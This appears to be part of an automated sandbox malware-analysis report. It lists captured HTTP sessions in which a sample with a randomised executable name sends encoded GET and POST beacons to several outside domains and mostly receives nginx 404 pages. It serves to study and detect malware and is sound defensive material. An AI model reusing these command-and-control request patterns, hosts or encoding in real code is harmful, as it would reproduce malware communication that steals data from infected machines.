                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        16192.168.2.949943194.85.61.76806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:46.512809992 CET342OUTGET /2pji/?bBw=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT82t+6t4M73z602ZXRfzEt+UzcIaSeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.mrpokrovskii.pro
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:21:47.856329918 CET691INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:21:47 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 548
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        17192.168.2.94996247.76.213.197806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:54.192934036 CET586OUTPOST /egqi/ HTTP/1.1
                                                                                                                        Host: www.ytsd88.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ytsd88.top
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ytsd88.top/egqi/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 57 35 66 78 66 53 66 32 68 6a 52 31 47 66 48 6b 47 51 2f 46 49 44 64 32 30 53 31 52 50 53 4a 76 4d 48 66 47 35 31 45 38 42 6d 36 4d 4b 79 56 50 42 5a 42 69 48 56 6c 58 37 52 6e 6f 4c 36 62 58 55 35 51 51 4c 77 56 46 33 46 4f 41 32 43 47 51 41 65 63 61 6b 74 64 33 35 4b 52 39 37 63 36 38 59 6c 5a 30 6c 7a 62 38 35 2b 59 71 6c 43 4b 58 39 35 68 63 74 2f 30 65 2f 6a 66 57 64 43 38 41 4a 32 79 37 31 2f 4e 34 67 51 53 44 39 76 52 5a 46 65 6b 78 71 42 74 55 56 77 72 62 32 46 4c 65 44 4e 4a 31 78 61 64 37 67 42 69 38 6e 2f 33 67 51 6d 4f 64 51 66 35 70 68 2f 64 65
                                                                                                                        Data Ascii: bBw=W5fxfSf2hjR1GfHkGQ/FIDd20S1RPSJvMHfG51E8Bm6MKyVPBZBiHVlX7RnoL6bXU5QQLwVF3FOA2CGQAecaktd35KR97c68YlZ0lzb85+YqlCKX95hct/0e/jfWdC8AJ2y71/N4gQSD9vRZFekxqBtUVwrb2FLeDNJ1xad7gBi8n/3gQmOdQf5ph/de
                                                                                                                        Nov 21, 2024 16:21:55.785877943 CET574INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:21:55 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 409
                                                                                                                        Connection: close
                                                                                                                        ETag: "66d016cf-199"
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        18192.168.2.94996847.76.213.197806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:56.860708952 CET610OUTPOST /egqi/ HTTP/1.1
                                                                                                                        Host: www.ytsd88.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ytsd88.top
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ytsd88.top/egqi/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 51 4b 4d 4b 54 6c 50 41 59 42 69 55 6c 6c 58 6a 42 6e 74 46 61 61 36 55 35 73 59 4c 78 70 46 33 42 65 41 32 44 32 51 41 74 30 64 6b 39 64 50 31 71 52 2f 6a 38 36 38 59 6c 5a 30 6c 7a 6e 57 35 2b 41 71 6c 7a 36 58 38 62 5a 66 6b 66 30 64 33 44 66 57 4c 43 38 4d 4a 32 79 6a 31 2b 42 57 67 53 71 44 39 72 64 5a 47 4d 4d 77 7a 78 74 57 52 77 72 50 79 30 7a 52 49 71 46 50 76 59 56 44 2f 6a 75 73 74 2b 4c 2b 42 55 48 47 46 49 35 4f 6d 59 55 32 6e 47 6e 6c 75 6e 41 73 38 31 57 69 49 70 5a 74 46 4f 73 78 49 41 3d 3d
                                                                                                                        Data Ascii: bBw=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBQKMKTlPAYBiUllXjBntFaa6U5sYLxpF3BeA2D2QAt0dk9dP1qR/j868YlZ0lznW5+Aqlz6X8bZfkf0d3DfWLC8MJ2yj1+BWgSqD9rdZGMMwzxtWRwrPy0zRIqFPvYVD/just+L+BUHGFI5OmYU2nGnlunAs81WiIpZtFOsxIA==


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        19192.168.2.94997647.76.213.197806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:59.540168047 CET1623OUTPOST /egqi/ HTTP/1.1
                                                                                                                        Host: www.ytsd88.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.ytsd88.top
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.ytsd88.top/egqi/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 57 35 66 78 66 53 66 32 68 6a 52 31 48 2b 33 6b 41 33 72 46 4f 6a 64 31 71 43 31 52 45 79 4a 30 4d 48 6a 47 35 78 39 6e 42 54 71 4d 4b 46 35 50 42 37 5a 69 58 6c 6c 58 39 52 6e 73 46 61 62 34 55 39 34 69 4c 78 6c 56 33 48 43 41 32 6c 69 51 52 6f 41 64 71 39 64 50 39 4b 52 2b 37 63 36 54 59 6c 4a 4f 6c 79 4c 57 35 2b 41 71 6c 77 53 58 31 70 68 66 6f 2f 30 65 2f 6a 65 5a 64 43 39 52 4a 32 71 64 31 2b 46 6f 67 42 69 44 39 4c 4e 5a 57 76 6b 77 73 42 74 59 57 77 71 49 79 31 4f 52 49 73 68 70 76 5a 78 74 2f 68 2b 73 74 66 7a 67 52 57 62 43 58 2b 31 52 6f 4c 6b 4f 6c 32 72 52 68 6c 6c 45 68 47 4f 38 63 4d 73 55 49 4d 68 54 57 4f 49 64 56 36 49 75 79 73 38 43 38 66 79 53 34 62 56 70 38 58 54 59 67 41 37 47 77 62 57 78 4c 54 70 2f 64 49 42 4a 33 45 39 39 4c 52 62 75 76 78 36 55 71 78 48 41 4c 39 38 4d 68 6b 50 46 4d 77 33 67 4c 51 42 43 32 76 37 43 31 50 36 63 33 65 73 6e 6d 44 31 32 63 36 44 59 79 59 4e 44 6e 4c 4a 49 5a 6b 6b 35 6c 50 2f 2b 59 43 48 47 45 41 66 57 4c 51 42 6c 73 6c 72 57 6b 6b [TRUNCATED]
                                                                                                                        Data Ascii: bBw=W5fxfSf2hjR1H+3kA3rFOjd1qC1REyJ0MHjG5x9nBTqMKF5PB7ZiXllX9RnsFab4U94iLxlV3HCA2liQRoAdq9dP9KR+7c6TYlJOlyLW5+AqlwSX1phfo/0e/jeZdC9RJ2qd1+FogBiD9LNZWvkwsBtYWwqIy1ORIshpvZxt/h+stfzgRWbCX+1RoLkOl2rRhllEhGO8cMsUIMhTWOIdV6Iuys8C8fyS4bVp8XTYgA7GwbWxLTp/dIBJ3E99LRbuvx6UqxHAL98MhkPFMw3gLQBC2v7C1P6c3esnmD12c6DYyYNDnLJIZkk5lP/+YCHGEAfWLQBlslrWkkS4TD8wJX/RF8ec/SLfasoB7h0Us4sqjTUyiQEJj8GS4V4qw46+zpJFklNOzLhq4LiXi5bA5MRO7kT/ZqHN9calv5N5DfUWUXieqAiGccC+Nr3hw30rsEMB3H6XmsowY/Ead+G6GAYZpp1YOS0iMeM3sTNFxkTl8FmZeJggD27NSbx7V5wpkSaayjls8H5Ji0lMk6DyHNYIwRRVeoOze3KvDO6FflFzKBTLzqzwxh3fkQgnt88UVfO++qwmhCmDeuLTKDFPiHLSbobJ6rkTYU7O9jRbjg72fUspyhJ8iUJvHlW77fkz/rG4oLYv0ACjS0zVk78Pww0y2miN0PeYnP8RveIgU3YItRL8QVDDpD00t2Rmuk86kbeFS4Kw8nDEYfJt+hj0zERNjmqFLWPydI4W7MpvmSVSOFhQgxhikYhXeXhAvyOzi/yXcO/rl8HD/1KKsrk/QulSvxi4ic9Qy6x7jNk0Vpq0MfeXhtkumK3PRJ9odz/sJ2bQxxR0eQ1eK/UjuE+JtHdGT5CuSo0JucQiRDCyn8Zh7G3DW2LGAg90yqYhoLTcutLU6V5dKiThrxmLmtDFrcIPZa866BiQ6YeGJOFtP2b3Da+59u/Oz0/I+r49qskogv4jt49eTxeDeM66jxU3J9W6IVVy5qR2RaRQJZpKcwcHBZRJ [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:22:01.155646086 CET574INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:00 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 409
                                                                                                                        Connection: close
                                                                                                                        ETag: "66d016cf-199"
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        20192.168.2.94998247.76.213.197806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:02.197689056 CET336OUTGET /egqi/?bBw=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8lot5wYlOl469WmdukWuN3NsqkmPJjQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.ytsd88.top
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:22:03.833364010 CET574INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:03 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 409
                                                                                                                        Connection: close
                                                                                                                        ETag: "66d016cf-199"
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                                                        Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        21192.168.2.949995208.91.197.27806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:09.627998114 CET616OUTPOST /hyyd/ HTTP/1.1
                                                                                                                        Host: www.matteicapital.online
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.matteicapital.online
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.matteicapital.online/hyyd/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 56 55 49 64 6e 47 68 68 34 68 66 4f 56 51 50 49 48 71 63 6c 33 61 33 56 6b 70 30 30 44 47 32 66 6f 49 4b 50 58 54 4b 6f 72 66 72 6c 78 57 64 46 57 4e 4e 77 4f 56 50 73 6d 79 33 2b 51 6f 4c 51 2f 44 34 6c 31 58 69 37 35 69 6a 55 61 79 57 75 47 57 58 5a 4a 69 6a 41 34 36 54 43 50 68 6f 37 41 69 36 36 73 48 30 58 49 36 4b 78 49 35 38 63 52 2b 4f 47 65 69 78 34 78 71 64 58 55 2f 4c 2f 4c 5a 32 49 73 59 62 43 50 39 31 50 68 54 54 39 66 48 79 38 6e 45 33 78 57 4a 6d 53 55 2b 2f 32 49 79 31 38 6d 2f 38 6e 52 72 37 66 68 4c 33 74
                                                                                                                        Data Ascii: bBw=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8nE3xWJmSU+/2Iy18m/8nRr7fhL3t


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        22192.168.2.949996208.91.197.27806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:12.295471907 CET640OUTPOST /hyyd/ HTTP/1.1
                                                                                                                        Host: www.matteicapital.online
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.matteicapital.online
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.matteicapital.online/hyyd/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 43 66 70 70 36 50 47 68 79 6f 6f 66 72 6c 36 32 64 45 59 74 4e 6e 4f 56 53 66 6d 7a 4c 2b 51 73 6a 51 2f 47 63 6c 31 6b 36 34 35 79 6a 57 4f 43 57 57 49 32 58 5a 4a 69 6a 41 34 35 75 58 50 68 77 37 42 53 4b 36 2b 57 31 6c 54 61 4b 79 50 35 38 63 47 75 4f 4b 65 69 77 76 78 70 59 79 55 35 50 2f 4c 5a 47 49 73 4a 62 42 47 39 31 46 2b 44 54 74 57 69 72 71 6b 30 54 43 64 5a 47 6b 4f 50 6e 73 43 7a 4a 69 33 4e 31 38 45 38 37 34 6d 73 2b 46 4d 69 6b 74 38 31 41 6d 36 4a 58 6b 32 4a 35 34 44 2b 56 41 68 41 3d 3d
                                                                                                                        Data Ascii: bBw=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E874ms+FMikt81Am6JXk2J54D+VAhA==


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        23192.168.2.949997208.91.197.27806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:14.965322971 CET1653OUTPOST /hyyd/ HTTP/1.1
                                                                                                                        Host: www.matteicapital.online
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.matteicapital.online
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.matteicapital.online/hyyd/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 53 6f 4e 72 56 68 5a 49 54 4e 54 79 48 67 4d 64 72 46 35 68 76 52 66 4e 61 77 50 49 4d 4b 63 68 33 61 37 56 6b 72 5a 70 44 30 36 66 70 66 6d 50 58 32 6d 6f 70 66 72 6c 33 57 64 4a 59 74 4d 6c 4f 56 4b 54 6d 7a 47 4a 51 75 62 51 2b 67 51 6c 69 6c 36 34 33 79 6a 57 4d 43 57 74 47 57 57 45 4a 69 7a 45 34 35 2b 58 50 68 77 37 42 55 6d 36 39 48 31 6c 55 71 4b 78 49 35 38 49 52 2b 4f 6d 65 69 70 61 78 6f 74 48 55 4b 48 2f 4c 35 57 49 76 2f 48 42 48 64 31 44 2f 44 53 79 57 69 75 30 6b 30 66 5a 64 5a 44 73 4f 49 72 73 50 31 41 70 74 75 41 71 58 4f 7a 4c 70 38 47 51 4c 46 78 52 35 55 31 79 37 59 7a 2b 72 70 6f 34 49 61 38 6c 6b 49 4f 64 76 68 63 54 61 51 79 4c 74 49 6f 67 43 66 41 37 35 4b 5a 63 74 31 48 78 6a 76 7a 58 35 4f 74 54 71 4d 65 63 59 41 6c 50 69 35 42 32 67 73 46 77 66 2b 73 59 68 52 78 77 35 6a 33 6f 72 4a 30 67 31 66 55 66 73 52 73 2b 34 68 31 75 71 77 32 4b 6f 58 5a 51 2f 68 57 72 58 75 72 41 74 52 49 42 62 7a 4a 49 7a 61 51 57 53 4b 70 44 35 37 4c 46 39 4d 6e 4e 68 5a 49 54 68 42 [TRUNCATED]
